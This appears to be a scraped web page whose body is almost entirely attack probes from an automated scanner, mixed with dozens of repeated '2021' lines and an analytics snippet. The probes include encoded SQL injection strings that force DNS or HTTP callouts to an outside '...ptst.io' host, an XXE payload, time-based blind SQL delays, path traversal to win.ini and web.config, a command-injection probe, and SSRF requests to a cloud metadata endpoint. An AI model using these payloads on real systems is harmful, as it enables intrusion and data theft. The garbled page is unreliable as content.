(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-82824809-1', 'auto');
ga('send', 'pageview');
2021’declare @q varchar(99) set @q=0x5c5c53454e54494e454c62316662353261666136356534393032643033346266383261643335356337332e707473742e696f5c617070636865636b exec master.dbo.xp_dirtree @q–3864
2021′,null);declare @q varchar(99) set @q=0x5c5c53454e54494e454c62316662353261666136356534393032613435346435356433393535646264652e707473742e696f5c617070636865636b exec master.dbo.xp_dirtree @q–0795
2021’/*x*/and/*x*/1=(SELECT/*x*/extractvalue(xmltype(‘<!DOCTYPE/*x*/root/*x*/[/*x*//*x*/%remote;]>’),’/l’)/*x*/from/*x*/dual)/*x*/or/*x*/’1234’=’7278351
2021) and 1=(UTL_INADDR.get_host_address(chr(83)||chr(69)||chr(78)||chr(84)||chr(73)||chr(78)||chr(69)||chr(76)||chr(98)||chr(49)||chr(102)||chr(98)||chr(53)||chr(50)||chr(97)||chr(102)||chr(97)||chr(54)||chr(53)||chr(101)||chr(52)||chr(57)||chr(48)||chr(50)||chr(53)||chr(56)||chr(49)||chr(101)||chr(55)||chr(99)||chr(49)||chr(100)||chr(56)||chr(49)||chr(55)||chr(100)||chr(98)||chr(53)||chr(55)||chr(99)||chr(46)||chr(112)||chr(116)||chr(115)||chr(116)||chr(46)||chr(105)||chr(111))) or 1234=(7270592
‘ ||(SELECT extractvalue(xmltype(‘<!DOCTYPE root [ %remote;]>’),’/l’) from dual) ||’
,(SELECT/*x*/extractvalue(xmltype(chr(60)||chr(63)||chr(120)||chr(109)||chr(108)||chr(32)||chr(118)||chr(101)||chr(114)||chr(115)||chr(105)||chr(111)||chr(110)||chr(61)||chr(34)||chr(49)||chr(46)||chr(48)||chr(34)||chr(32)||chr(101)||chr(110)||chr(99)||chr(111)||chr(100)||chr(105)||chr(110)||chr(103)||chr(61)||chr(34)||chr(85)||chr(84)||chr(70)||chr(45)||chr(56)||chr(34)||chr(63)||chr(62)||chr(60)||chr(33)||chr(68)||chr(79)||chr(67)||chr(84)||chr(89)||chr(80)||chr(69)||chr(32)||chr(114)||chr(111)||chr(111)||chr(116)||chr(32)||chr(91)||chr(32)||chr(60)||chr(33)||chr(69)||chr(78)||chr(84)||chr(73)||chr(84)||chr(89)||chr(32)||chr(37)||chr(32)||chr(114)||chr(101)||chr(109)||chr(111)||chr(116)||chr(101)||chr(32)||chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)||chr(32)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)||chr(58)||chr(47)||chr(47)||chr(83)||chr(69)||chr(78)||chr(84)||chr(73)||chr(78)||chr(69)||chr(76)||chr(98)||chr(49)||chr(102)||chr(98)||chr(53)||chr(50)||chr(97)||chr(102)||chr(97)||chr(54)||chr(53)||chr(101)||chr(52)||chr(57)||chr(48)||chr(50)||chr(51)||chr(49)||chr(55)||chr(99)||chr(53)||chr(51)||chr(48)||chr(97)||chr(100)||chr(99)||chr(56)||chr(48)||chr(102)||chr(52)||chr(100)||chr(52)||chr(46)||chr(112)||chr(116)||chr(115)||chr(116)||chr(46)||chr(105)||chr(111)||chr(47)||chr(34)||chr(62)||chr(32)||chr(37)||chr(114)||chr(101)||chr(109)||chr(111)||chr(116)||chr(101)||chr(59)||chr(93)||chr(62)),chr(47)||chr(108))/*x*/from/*x*/dual)/*x*/asc/*x*/–oraorderby8748
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021appcheck’
2021′) and 32=32 or ‘1234’=(‘7278532
2021) and 38=38 or 1234=(7277652
2021′) and (case when 6=7 then 1 else 1/0 end)=1 or ‘1234’=(‘7271251
2021) and (case when 20=21 then 1 else 1/0 end)=1 or 1234=(7278603
2021’+(case whEn 7=7 then 1 else (sEleCt 8 unIon selecT 9) end)+’
2021+(cAse wHen 43=44 then ‘1’ else (sElEct 8 uNioN sElEct 9) end)+1
2021’+ExtractValue(0x20,(select(case when 26=27 then 0x2f else 0x5c end)))+’
2021+ExtractValue(0x20,(select(case/*x*/when/*x*/32=32/*x*/then/*x*/0x2f/*x*/else/*x*/0x5c/*x*/end)))+1
2021 declare/**/@q/**/varchar(8000)/**/set/**/@q=0x2077616974666f722064656c61792027303a303a313027/**/exec(@q)–7016
/*x*/waitfor/*x*/delay/*x*/’0:0:10′–
2021′) and 0=((SELECT 1 FROM (SELECT SLEEP(10))A)) or 8=((SELECT 1 FROM (SELECT SLEEP(10))A)) or ‘1234’=(‘7270265
(SELECT/*x*/1/*x*/FROM/*x*/(SELECT/*x*/SLEEP(10))A)–
2021’/*x*/and/*x*/0=(DBMS_PIPE.RECEIVE_MESSAGE(CHR(41),10))/*x*/or/*x*/8=(DBMS_PIPE.RECEIVE_MESSAGE(CHR(41),10))/*x*/or/*x*/’1234’=’7274306
/*x*/||(DBMS_PIPE.RECEIVE_MESSAGE(CHR(41),10))/*x*/||
2021) and 0=((select count(pg_sleep(10)))) or 8=((select count(pg_sleep(10)))) or 1234=(7274496
2021)(select/*x*/count(pg_sleep(10)))–6863
,((select count(pg_sleep(10)))) asc –oraorderby8617
2021
../2021
2021
testheaderxxx: testval1
2021
wp-comments-post.php
2021
2021
2021
2021
2021
2021
2021
2021
/../../../../../../../../../../../../../../../windows\win.ini
%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2fwindows%5cwin.ini
WEB-INF/web.xml
%2f%2e%2e%2f%2e%2e%2fweb.config
%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWEB-INF%2fweb.xml
2021
2021
2021&help&’\”`0&help&`’
2021
2021
2021
http://169.254.169.254/latest/meta-data/?2021
2021
http://169.254.169.254/latest/meta-data/
2021
2021
cq7e5748befc9f64b1fcq71768999667cq7
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021
2021